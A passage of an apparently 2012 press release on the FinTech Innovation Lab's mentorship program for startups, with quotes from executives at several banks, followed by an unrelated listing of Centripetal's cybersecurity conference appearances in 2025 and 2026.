to use the latest HTML standards to deploy high-performance, interactive trading applications. The company’s patent-pending software enables Web applications to run outside-the-browser and is tailored to meet the strict security and compliance requirements of financial institutions. ScrollMotion – an enterprise mobile software company noted for its ScrollMotion Enterprise Platform, whose Web-based drag-and-drop interface lets customers create and build engaging applications for the iPad and other tablets, distribute the apps in real-time and measure their use – all without the need for advanced programming skills. Through the mentorship program the six companies developed relationships with key decision-makers at leading banks and gained in-depth knowledge about their customers’ needs, helping them more quickly develop their products and services. The Lab featured workshops on topics such as navigating bank procurement processes, integrating with bank technology systems and running successful pilot programs at financial institutions. “The FinTech Innovation Lab allows inspiring entrepreneurs far more effective product development and feedback from the upper echelons of their target market, accelerating company growth and job creation,” said Maria Gotsch, President and CEO of the Partnership Fund for New York City. “By growing the FinTech industry in New York City, we will further cement New York’s reputation as the leader of innovation in the financial services sector, as well as reinforce our newfound reputation as a hub of technology development and talent.” “In the three years since its creation, the FinTech Innovation Lab has provided early- and growth-stage technology companies with direct access to leading global financial institutions based in New York,” said Bob Gach, a global managing director in Accenture’s Capital Markets Practice. “This year’s class showcased innovative products that are likely to have a significant impact in the marketplace, and we expect these companies to continue to create jobs in the technology and financial services sectors.” Financial-services firms that support the Lab include: American Express, Bank of America, Barclays, Capital One, Citigroup, Credit Suisse, Deutsche Bank, Goldman Sachs, JP Morgan Chase, Morgan Stanley, State Street Corporation and UBS. Ally Financial and New York Life joined the Lab for the first time in September 2012. Supporting venture-capital firms include Bain Capital Ventures, Contour Venture Partners, Rho Ventures, RRE Ventures and Warburg Pincus. “At Ally, we are committed to embracing leading technology solutions for our customers and employees. The FinTech Innovation Lab has been an important partner in this process, and we are excited about the outcome of this year’s program,” said Michael Baresich, Chief Information Officer at Ally Financial Inc. “Emerging technology companies often need assistance marketing their solutions to corporate clients,” said David Reilly, Managing Director, Technology Infrastructure at Bank of America. “Through the FinTech Innovation Lab, we advise them how to navigate large companies and showcase their products to specific IT organizations and people of influence. We’ve found these companies value our assistance, and it’s beneficial for us to engage with new IT talent and be exposed to groundbreaking products and services.” “The FinTech Innovation Lab provides a venue for us to work hand-in-hand with entrepreneurs to develop promising new technologies for our industry,” said Monique Shivanandan, Capital One’s senior vice president and chief technology officer. “As our customers continue to demand new, more convenient ways to bank, technology will be the key to delivering differentiated products and services.” “Deutsche Bank has been a proud FinTech Innovation Lab partner since its start. Being a part of the program provides a valuable window into new technology trends that have yet to find an application in financial services and allows us to foster the growth of technology companies in New York City,” said Robert Torop, Director and Domain Architect in Application Services, Deutsche Bank. “We are very happy to continue to support the FinTech program and help foster this growing sector in New York City. From the very start of the 12-week program, we have been consistently impressed with the participants’ deep level of pure and applied technical innovation,” said Nigel Faulkner, CIO, Investment Banking at Credit Suisse. “JPMorgan Chase is proud to once again support the FinTech Innovation Lab,” said Larry Feinsmith, Managing Director, Technology Strategy and Partnerships with the New York based firm. “This year’s graduates represent an amazing scope of talent, innovative ideas and disruptive technology solutions that will help drive the Financial Services industry forward in the coming years. We are pleased to have a part in their development.” “Morgan Stanley continues to be an enthusiastic participant of the FinTech program and appreciates the opportunity to support technology entrepreneurs in our community. We are committed to finding ways to foster innovation in financial technologies and are pleased to have had such high quality engagement with top class emerging companies through the program,” said Steve Sparkes, Managing Director, CIO, Technology & Information Risk at Morgan Stanley. Based on the success of the FinTech Innovation Lab in New York, Accenture launched the FinTech Innovation Lab London last year, teaming with leading banks and venture-capital companies to identify leading-edge technology from the United Kingdom, Europe and internationally. About the Partnership Fund for New York City The Partnership Fund for New York City (www.pfnyc.org) – formerly the New York City Investment Fund – is the vision of Henry R. Kravis, founding partner of Kohlberg Kravis Roberts & Co., who serves as its Founding Chairman. The Fund has raised over $110 million to mobilize the city’s world financial and business leaders to help build a stronger and more diversified local economy. It has built a network of top experts from the investment and corporate communities who help identify and support New York City’s most promising entrepreneurs in both the for-profit and not-for-profit sectors. The Fund is governed by a Board of Directors co-chaired by Richard M. Cashin, Managing Partner of One Equity Partners, and Charles “Chip” Kaye, co-president of Warburg Pincus LLC. The Partnership Fund is an affiliate of the Partnership for New York City (www.pfnyc.org), an organization of the leaders of New York City’s top corporate, investment, and entrepreneurial firms. They work in partnership with city and state government officials, labor groups, and the nonprofit sector to promote the interest of the city and its neighborhoods. About Accenture Accenture is a global management consulting, technology services and outsourcing company, with approximately 261,000 people serving clients in more than 120 countries. Combining unparalleled experience, comprehensive capabilities across all industries and business functions, and extensive research on the world’s most successful companies, Accenture collaborates with clients to help them become high-performance businesses and governments. The company generated net revenues of US$27.9 billion for the fiscal year ended Aug. 31, 2012. --- ## Events ### [California Cybersecurity Education Summit](https://www.centripetal.ai/events/california-cybersecurity-education-summit) Published: 2026-09-03 Summary: Meet Centripetal at the Cyber Ireland National Conference and see how stopping known threats before they reach your network reduces risk, noise, and workload. --- ### [Cyber Ireland National Conference](https://www.centripetal.ai/events/cyber-ireland-2026) Published: 2026-09-03 Summary: Meet Centripetal at the Cyber Ireland National Conference and see how stopping known threats before they reach your network reduces risk, noise, and workload. --- ### [BSides Nashville](https://www.centripetal.ai/events/bsides-nashville-2026) Published: 2026-04-10 Summary: Join Centripetal at BSides Nashville to explore how stopping known threats earlier reduces what reaches your network—and why most risk isn’t new, it’s just not stopped in time. --- ### [Information Security Forum for Texas Government](https://www.centripetal.ai/events/information-security-forum-for-texas-government) Published: 2026-04-09 Summary: Visit Centripetal at Booth 145A at the Information Security Forum for Texas Government to see how stopping known threats before they reach your network reduces risk, noise, and downstream workload. --- ### [CPP InVision 2026 Tech Summit](https://www.centripetal.ai/events/cpp-invision-2026-tech-summit) Published: 2026-04-08 Summary: Join Centripetal at the CPP InVision 2026 Tech Summit to explore how global conflict shapes cyber risk and how organizations are strengthening defenses against evolving threats, infrastructure… --- ### [Ireland Insider Intelligence Spring Summit](https://www.centripetal.ai/events/ireland-insider-intelligence-spring-summit) Published: 2026-04-08 Summary: Join Centripetal for the Insider Intelligence Summit on May 12th at Platform94 in Galway, Ireland. Understand how cyber attacks actually unfold, explore real threat intelligence, and gain practical… --- ### [Nevada Public Sector Cybersecurity Summit](https://www.centripetal.ai/events/nevada-public-sector-cybersecurity-summit) Published: 2026-04-08 Summary: Join Centripetal at the Nevada Public Sector Cybersecurity Summit to explore how government teams are reducing risk, improving visibility, and managing technical debt in complex, distributed… --- ### [EDUCAUSE Cybersecurity and Privacy Professionals Conference](https://www.centripetal.ai/events/educause-anaheim-2026) Published: 2026-03-20 Summary: Join Centripetal at EDUCAUSE in Anaheim at Table #7. Hear new research on higher education cyber risk and connect with our team on reducing exposure and stopping threats earlier. --- ### [FutureCon Baltimore](https://www.centripetal.ai/events/futurecon-baltimore-2026) Published: 2026-01-28 Summary: Join us at FutureCon Baltimore on February 12 to explore proactive cybersecurity, meet the team, and attend Jeff Luna’s session on translating cyber risk into boardroom ROI. --- ### [Future Networks LIVE](https://www.centripetal.ai/events/future-networks-live-2026) Published: 2026-01-21 Summary: Meet Centripetal at Future Networks LIVE in Reading, England on April 28, 2026. Hear Dave Silke explain how teams move from alert overload to intelligence-driven network security. --- ### [Known Vulnerabilities Across Higher Education: What the Data Shows and Why It Matters](https://www.centripetal.ai/events/known-vulnerabilities-across-higher-education-what-the-data-shows-and-why-it-matters) Published: 2026-01-16 Summary: See what six months of data from 50 universities reveals about known vulnerabilities in higher ed. Join us live January 29 --- ### [FutureCon Nashville](https://www.centripetal.ai/events/futurecon-nashville) Published: 2025-10-22 Summary: Hear from our esteemed speakers while gaining up to 10 CPE credits. Immerse yourself in the latest cybersecurity developments to gain valuable insights in today’s dynamic threat landscape. Learn how… --- ### [FutureCon Austin](https://www.centripetal.ai/events/futurecon-austin) Published: 2025-10-22 Summary: Hear from our esteemed speakers while gaining up to 10 CPE credits. Immerse yourself in the latest cybersecurity developments to gain valuable insights in today’s dynamic threat landscape. Learn how… --- ### [Brainstorm Poconos](https://www.centripetal.ai/events/brainstorm-poconos) Published: 2025-10-22 Summary: With over 120 technology-focused sessions, you’ll hear from your colleagues (IT Directors, Tech Coordinators, System Admins, Network Admins, Desktop Techs, etc.) and vendors in the K20 community.… --- ### [FutureCon Boston](https://www.centripetal.ai/events/boston-ma-2025) Published: 2025-10-22 Summary: Join us at FutureCon Boston on November 20th to talk about the challenge you know all too well: operating in a complex, high-stress environment where alerts never stop, tools pile up, and most threat… --- ### [SecureMaine](https://www.centripetal.ai/events/secure-maine-2025) Published: 2025-10-08 Summary: Join Centripetal at SecureMaine 2025. Visit Booth #2 to meet our team and explore how intelligence-driven protection strengthens security across every environment. --- ### [CPP InVision NYC Tech Summit](https://www.centripetal.ai/events/cpp-invision-nyc) Published: 2025-10-08 Summary: Join Centripetal at the CPP InVision 2025 NYC Tech Summit on October 16th. Connect with Michael Cooney to learn how intelligence-driven protection helps IT leaders simplify environments, control… ---